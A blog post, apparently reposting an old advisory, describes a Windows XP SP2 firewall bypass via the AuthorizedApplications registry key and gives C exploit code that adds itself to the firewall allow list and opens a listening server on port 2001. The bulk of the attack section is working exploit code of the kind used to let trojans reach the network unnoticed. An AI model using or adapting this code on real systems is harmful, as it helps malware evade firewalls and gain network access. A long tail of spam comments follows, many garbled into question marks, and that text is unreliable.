There is a technique using which we can bypass windows-xp service pack-2 firewall.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.
Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall’s registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.
Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zip
Vulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.
If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
Exploit :-
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include “Shlwapi.h”int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, “:*:Enabled:”);
strcat(buffer, “bugg”);
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
“SYSTEM\\CurrentControlSet\\Services” “\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile” “\\AuthorizedApplications\\List”,
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, “Simple server example with Anti SP2 firewall trick \n”);
fprintf(stdout, ” This is not trojan \n”);
fprintf(stdout, ” Opened port is :2001 \n”);
fprintf(stdout, “author:Mark Kica student of Technical University Kosice\n”);
fprintf(stdout, “Dedicated to Katka H. from Levoca \n”);
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror(“accept”);
continue;
}
temp = send(new_fd, “Hello World\r\n”, strlen(“Hello World\r\n”), 0);
fprintf(stdout, “Sended: Hello World\r\n”);
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = ‘\0’;
fprintf(stdout, “Recieved: %s\r\n”, buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, “quit”))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */
??? ???????????, ??? ????? ?????????? ?????????? ? ???? ??????. ? ????????, ??? ???? ????? ????????????? ? ?????? ???? ????????? ??????? ????????? ? ?????????? ????????. ?????????? ?????????? ?? ??? ?????????!
I take pleasure in, lead to I discovered just what I used to be having a look for. You have ended my four day lengthy hunt! God Bless you man. Have a nice day. Bye
? ???????? ???? ???????! ??? ?? ?????? ????????????? ??????????, ?? ? ???????? ? ???? ????????????? ??????. ????? ????? ??????? ???? ??????? ? ???????????, ??? ?????? ??? ?????? ???????? ????????????.
It’s truly a great and useful piece of information. I’m satisfied that you shared this useful information with us. Please stay us up to date like this. Thanks for sharing.
?????? ???????? ??????????, ????????????? ??????? ? ??????????????.
I blog often and I really appreciate your content. Your article has really peaked my interest. I will take a note of your site and keep checking for new information about once a week. I opted in for your Feed as well.
Nice blog here! Also your web site loads up fast! What web host are you using? Can I get your affiliate link to your host? I wish my web site loaded up as fast as yours lol
?????? ???????? ?????????? ??????????, ??? ???????? ????? ????? ??????? ????????.
I do consider all the ideas you have presented for your post. They are very convincing and can definitely work. Nonetheless, the posts are too quick for novices. Could you please prolong them a little from subsequent time? Thank you for the post.
WOW just what I was searching for. Came here by searching for keyword
????? ?????????? ?????????, ?????????????? ???????????? ???????????, ????? ??????? ???????? ? ????? ????????????.
????? ?????? ???????????? ?????????? ? ??????????? ??????, ??????? ???????????? ??????.
Can you be more specific about the content of your article? After reading it, I still have some doubts. Hope you can help me.
?????? ???????????? ?????????? ? ?????????? ?????, ???????????? ???????? ????? ? ??????????.
????? ????????????? ?????? ?????????? ? ??????????? ????????? ???????? ? ??????? ????????.
??? ???????? ????????? ???????? ??????????? ????????????? ? ??????????????? ????.
????? ???????? ?????? ????????? ? ?????, ???????? ????????? ??????? ??????????? ??????.
????? ????????? ?????????? ???????????, ???????????? ?????????? ??? ??????????? ????????.
I like the valuable information you provide in your articles. I will bookmark your blog and check again here regularly. I’m quite certain I will learn many new stuff right here! Good luck for the next!
Write more, thats all I have to say. Literally, it seems as though you relied on the video to make your point. You clearly know what youre talking about, why throw away your intelligence on just posting videos to your weblog when you could be giving us something informative to read?
? ????? ?? ??????????? ???????? ? ?????????????????? ????????? ? ???? ??????. ????? ????? ?????????? ?????????? ? ???????? ? ???????? ???????, ??? ??????? ??? ????? ??????? ????????. ????? ?????? ??????!
hello there and thank you for your info – I have definitely picked up something new from right here. I did however expertise some technical issues using this web site, since I experienced to reload the web site a lot of times previous to I could get it to load properly. I had been wondering if your web hosting is OK? Not that I’m complaining, but sluggish loading instances times will sometimes affect your placement in google and can damage your high-quality score if ads and marketing with Adwords. Well I’m adding this RSS to my e-mail and could look out for much more of your respective fascinating content. Make sure you update this again very soon.
??? ?????????? ??????????? ?????? ??????, ??????? ?? ?????????????? ?????? ??????.
Superb site you have here but I was wanting to know if you knew of any forums that cover the same topics talked about in this article? I’d really like to be a part of group where I can get suggestions from other experienced individuals that share the same interest. If you have any suggestions, please let me know. Kudos!
????? ????????????? ?????????? ??????????, ????? ???????? ??? ????????? ??????????? ?????? ?? ?????? ????.
?????? ???????????? ?????????? ? ????????? ???????? ????, ??????????? ?? ??????????? ??????????.
? ???? ????????????? ?????? ???? ??????. ??? ????????????? ?????????? ?????? ? ?????? ??? ??????? ????????? ????????. ???????? ?? ??????? ?????? ?????? ?? ???????????? ? ????????? ??????????.
It’s amazing to pay a visit this web page and reading the views of all friends about this article, while I am also eager of getting know-how.
With havin so much content and articles do you ever run into any issues of plagorism or copyright violation? My blog has a lot of completely unique content I’ve either authored myself or outsourced but it looks like a lot of it is popping it up all over the web without my authorization. Do you know any ways to help prevent content from being stolen? I’d genuinely appreciate it.
?????? ????????????? ???????? ??????????, ?????????? ?? ???????? ????????????.
? ????? ?? ???????? ???? ????????????? ?????? ???? ?????? ?? ????????????? ??????????, ??????? ?? ???????????. ? ????? ?????? ?? ?????? ???? ??????? ? ??????? ????? ??????. ??? ????????????? ?????? ??????!
????? ????????????? ?????????? ??????????, ??????? ???????? ???????? ???? ? ????? ????????? ??????? ? ?????????.